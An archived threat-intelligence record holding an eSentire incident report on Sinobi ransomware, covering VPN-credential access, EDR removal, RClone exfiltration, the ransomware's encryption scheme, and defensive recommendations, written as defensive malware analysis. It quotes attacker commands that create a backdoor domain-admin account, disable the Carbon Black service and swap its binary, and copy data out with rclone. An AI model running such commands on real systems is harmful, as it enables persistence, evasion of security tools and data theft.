{
	"id": "8f116675-4654-4bbf-9763-a469ae747153",
	"created_at": "2026-04-06T00:12:57.375563Z",
	"updated_at": "2026-04-10T13:11:44.508084Z",
	"deleted_at": null,
	"sha1_hash": "410756807c42a3d9972e6eb6350d26b46406173b",
	"title": "Threat Actors Deploy Sinobi Ransomware via Compromised SonicWall SSL VPN Credentials",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2496095,
	"plain_text": "Threat Actors Deploy Sinobi Ransomware via Compromised\r\nSonicWall SSL VPN Credentials\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 18:09:16 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nIn August 2025, eSentire's Threat Response Unit (TRU) detected a ransomware attack attributed to an affiliate of\r\nSinobi Group. Due to significant code overlaps and other similarities in the ransomware binaries and data leak\r\nsites, Sinobi is suspected to be a rebrand of Lynx, a Ransomware-as-a-Service (RaaS) group that first emerged in\r\n2024.\r\nWith medium confidence, it is believed Lynx purchased the INC Ransomware source code from the user,\r\n“salfetka” (Russian word for “napkin”) who allegedly advertised it for sale via Exploit/XSS hacking forums.\r\nFigure 1 – Sales advert on hacking forum by salfetka, source: BleepingComputer/KELA\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 1 of 13\n\nThe group successfully uninstalled Carbon Black EDR before exfiltrating sensitive data from a mapped network\r\ndrive using RClone. The attack culminated in the deployment of Sinobi Ransomware, which encrypted files across\r\nlocal and shared network drives, leaving behind ransom notes and files marked by the .SINOBI file extension.\r\nInitial Access\r\nA Sinobi Group affiliate leveraged compromised third-party MSP SonicWall SSL VPN credentials that mapped to\r\nan over-privileged Active Directory account (domain administrator rights), enabling internal network access and\r\ndirect RDP access to a file server.\r\nUsing the compromised account, the threat actors executed commands to create a new local administrator account,\r\nset its password, and add it to the domain administrators group. Both the initial compromised account and the\r\nnewly created account were subsequently used for lateral movement throughout the network.\r\ncmd /c net localgroup administrators Assistance /add\r\ncmd /c net user Assistance /add\r\ncmd /c net localgroup \"domain admins\" Assistance /add\r\nThe threat actors initially attempted to uninstall Carbon Black using Revo Uninstaller and various command-line\r\noperations, but these efforts were unsuccessful. However, they ultimately succeeded in uninstalling Carbon Black\r\nfrom the file server, possibly after discovering the deregistration code stored somewhere on the file server itself—\r\non a mapped drive or network share.\r\nsc config cbdefense start= disabled\r\ncmd /c sc config cbdefense binpath= “C:\\programdata\\bin.exe” \u0026 shutdown /r /t 0\r\nThe Sinobi Group affiliate then exfiltrated data using RClone, a legitimate, well-known, and frequently abused\r\ncommand-line utility used to transfer files to cloud storage. Exfiltrated data was sent to an IP address belonging to\r\nASN 215540 (Global Connectivity Solutions LLP), a hosting provider TRU has commonly observed in other\r\ncyberattacks.\r\nrclone.exe --config=c:\\programdata\\rclone-ssh.conf copy \u003cREDACTED_SRC_PATH\u003e remote:\u003cREDACTED_DEST_PATH\u003e --max-a\r\nAnalysis of Sinobi Ransomware (bin.exe)\r\nSinobi Ransomware is suspected to be a rebrand of Lynx Ransomware due to significant code overlaps between\r\nthe Lynx and Sinobi ransomware binaries and leak sites. eSentire has uploaded the binary in question to\r\nVirusTotal for security researchers to download available here.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 2 of 13\n\nFigure 2 – Lynx vs Sinobi code comparison\r\nThe next figure shows the menu bar of the new Sinobi data leak website alongside the old Lynx data leak website,\r\nfurther contributing to the suspicion of Sinobi being a rebrand.\r\nFigure 3 – Lynx vs Sinobi leak-site comparison\r\nSinobi ransomware uses Curve-25519 Donna + AES-128-CTR to encrypt files, making recovery impossible\r\nwithout the attacker’s Curve-25519 private key. This technique is identical to other ransomware variants like\r\nBabuk. It uses multi-threading and completion ports to read/write files efficiently and generates a new key per file\r\nvia CryptGenRandom.\r\nUsage instructions (shown below) for the ransomware can be printed by passing the --help command line option.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 3 of 13\n\nFigure 4 – Usage instructions for Sinobi Ransomware\r\nPrior to encrypting files, the ransomware deletes all files in the Recycle Bin via the SHEmptyRecycleBinA API,\r\nensuring that files that were in the Recycle Bin are unable to be restored.\r\nFigure 5 – Usage of SHEmptyRecycleBinA to empty the recycle bin\r\nThe next figure shows the code responsible for enumerating hidden drives/volumes and mounting them,\r\neffectively maximizing the extent of damage caused in the file enumeration/encryption process.\r\nFigure 6 – Enumeration/mounting of hidden drives\r\nVolume shadow copies are deleted through a technique that makes use of DeviceIOControl with the\r\nIOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE control code (0x53C028) and 0 for the input buffer, resizing\r\nthe space for shadow copies to 0, effectively causing Windows to delete them. This technique was previously\r\nreported in 2020 by Fortinet’s Ben Hunter here.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 4 of 13\n\nFigure 7 – Volume Shadow Copy deletion via DeviceIOControl with\r\nIOCTL_VOLSNAP_SET_MAX_DIFF_AREA_SIZE\r\nIf the --kill command line option was specified by the attacker, it proceeds to kill the following processes:\r\nsql\r\nveeam\r\nbackup\r\nexchange\r\njava\r\nnotepad\r\nIt then spawns a thread per file which generates Curve-25519 keys and makes use of Restart Manager APIs to find\r\nand kills processes with open handles to the file. It also creates an ACE that grants the Everyone SID\r\nGENERIC_ALL, and attempts to set that DACL on the file.\r\nIf it fails, it enables SeTakeOwnershipPrivilege, attempts to set the owner to that SID, and then sets the DACL\r\nagain, effectively granting full control of the file to everyone. Afterwards, it queues the file for encryption via\r\ncompletion ports.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 5 of 13\n\nFigure 8 – Usage of Restart Manager API to find/kill processes with open handles\r\nFigure 9 – Full access to Everyone SID and taking ownership of file\r\nThe attacker’s base64 encoded Curve-25519 public key is decoded to binary form (32 bytes) by calling\r\nCryptStringToBinaryA with the CRYPT_STRING_BASE64 flag. Immediately after, the AES-128-CTR key and\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 6 of 13\n\ncounter are generated through a function call at offset 0x67A2 (shown below as\r\nmw_curve_25519_gen_aes_key_counter).\r\nFigure 10 – Decoding attacker Curve-25519 public key from base64 and generating AES\r\nkey/counter\r\nThe next figure displays the code responsible for generating each file’s Curve-25519 private key, which is\r\ndiscarded after use, otherwise it could be used to compute each shared secret, derive the AES key/counter, and\r\ndecrypt each file.\r\nFigure 11 – Curve-25519 private key generation via CryptGenRandom\r\nThe figure below displays the code responsible for clamping the victim’s Curve-25519 private key, computing the\r\nCurve-25519 public key/shared secret, and SHA512 hashing the public key and shared secret. The SHA512 hash\r\nof the shared secret is used in deriving the AES key (first 16 bytes), and counter block bytes (latter 16 bytes).\r\nFigure 12 – Deriving public key and shared secret, SHA512 shared secret\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 7 of 13\n\nThe next figure displays the AES round key generation function, encrypted file name concatenation, chunking\r\nsize, and the encryption mode are queued for processing via completion ports.\r\nFigure 13 – Generate encrypted file name, AES round keys, mode, chunk size\r\nEach encrypted file is appended with a footer (annotated below) for the threat actors (who have the Curve-25519\r\nprivate key) to decrypt files. The threat actor’s decrypter will parse this footer, extract the victim file’s public key\r\nbytes, compute the shared secret via Eliptic Curve Diffie Hellman Key Exchange with their Curve-25519 private\r\nkey, and SHA512 it.\r\nThe resulting SHA512 is used to derive the AES key (first 16 bytes) and counter block bytes (latter 16 bytes) to\r\ndecrypt the file. The footer also contains a magic, “SINOBI”, the chunking size (0xF4240), and whether the file\r\nwas encrypted in its entirety as a boolean.\r\nFigure 14 – Encrypted file containing file footer\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 8 of 13\n\nSinobi writes a ransom note titled README.txt to each directory, where a file is encrypted containing instructions\r\nfor the victim, extorting them into paying the ransom or risk having stolen data leaked on the dark web.\r\nFigure 15 – Content of the ransom note in the README.txt file\r\nThe victim’s wallpaper is then set to the following image which is generated on-the-fly and written to disk. The\r\nimage written to disk is then set in the registry key HKCU\\Control Panel\\Desktop\\Wallpaper, effectively setting\r\nthe wallpaper of the victim machine programmatically.\r\nFigure 16 – Ransom note wallpaper\r\nBecause the usage of Curve-25519 + AES-128-CTR is relatively common in ransomware, eSentire has created a\r\nPython script available here to validate ransomware variants’ ciphertext that make use of the methods described\r\nhere-in.\r\nThis can be used by ransomware researchers as a “shortcut” to determine whether a ransomware developer\r\nmaking use of this technique made an error in their code, leading to the potential of creating a decryption utility\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 9 of 13\n\nfor victims. It is also worth noting that the method used in generating the Curve-25519 private key is another\r\npotential avenue to decrypt victim files, e.g. keys generated through non-cryptographically secure means.\r\nUnfortunately, Sinobi ransomware generates keys via CryptGenRandom, which is considered to be a\r\ncryptographically secure pseudorandom number generator.\r\nFigure 17 – Script for ransomware researchers to verify crypto of ransomware using Curve-25519\r\n+ AES-128-CTR + SHA512\r\nWhat did we do?\r\nOur team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the\r\ncustomer’s behalf.\r\nWe communicated what happened with the customer and helped them with remediation efforts.\r\nWhat can you learn from this TRU Positive?\r\nSinobi Ransomware is likely a rebrand of Lynx Ransomware and makes use of Curve-25519 + AES-128-\r\nCTR to encrypt victim files, making recovery impossible without the attacker’s private key.\r\nSinobi Group affiliates leveraged compromised third-party MSP credentials for SonicWall SSL VPN\r\naccess, using this trusted relationship to gain initial network access and conduct lateral movement across\r\nthe victim organization.\r\nRecommendations from the Threat Response Unit (TRU)\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 10 of 13\n\nAvoid storing “uninstall” codes for your Endpoint Detection and Response (EDR) tool in file shares and\r\nother mediums that may become accessible to an attacker.\r\nOrganizations should strictly avoid assigning excessive privileges to remote access accounts, particularly\r\nVPN users. In this incident, the compromise of SonicWall SSL VPN credentials that possessed Active\r\nDirectory domain administrator rights enabled the threat actors to gain immediate, elevated access to\r\ncritical infrastructure.\r\nImplement a comprehensive vulnerability management service with robust patch management solution and\r\nprocess to ensure systems are up to date with the latest security patches before exposing them to the\r\nInternet.\r\nConfigure anti-tampering features in your endpoint security policies Next-Gen AV (NGAV) or Endpoint\r\nDetection and Response (EDR). Though not foolproof, these settings add an extra layer of defense against\r\nattackers attempting to disable your security tools.\r\nIndicators of Compromise\r\nIndicators of Compromise can be found here.\r\nReferences\r\nhttps://www.bleepingcomputer.com/news/security/inc-ransomware-source-code-selling-on-hacking-forums-for-300-000/\r\nhttps://github.com/sonicwall/sonicos-automation\r\nhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015\r\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\nhttps://vampir3blu.es/posts/1/\r\nhttps://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange\r\nhttps://www.cyfirma.com/news/weekly-intelligence-report-11-july-2025/\r\nhttps://www.picussecurity.com/resource/blog/lynx-ransomware\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 11 of 13\n\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 12 of 13\n\nSource: https://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nhttps://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.esentire.com/blog/threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials"
	],
	"report_names": [
		"threat-actors-deploy-sinobi-ransomware-via-compromised-sonicwall-ssl-vpn-credentials"
	],
	"threat_actors": [
		{
			"id": "c30358aa-384c-40ad-bac5-54aa6a40224a",
			"created_at": "2026-02-03T02:00:03.448178Z",
			"updated_at": "2026-04-10T02:00:03.945403Z",
			"deleted_at": null,
			"main_name": "Sinobi",
			"aliases": [],
			"source_name": "MISPGALAXY:Sinobi",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434377,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.pdf",
		"text": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.txt",
		"img": "https://archive.orkl.eu/410756807c42a3d9972e6eb6350d26b46406173b.jpg"
	}
}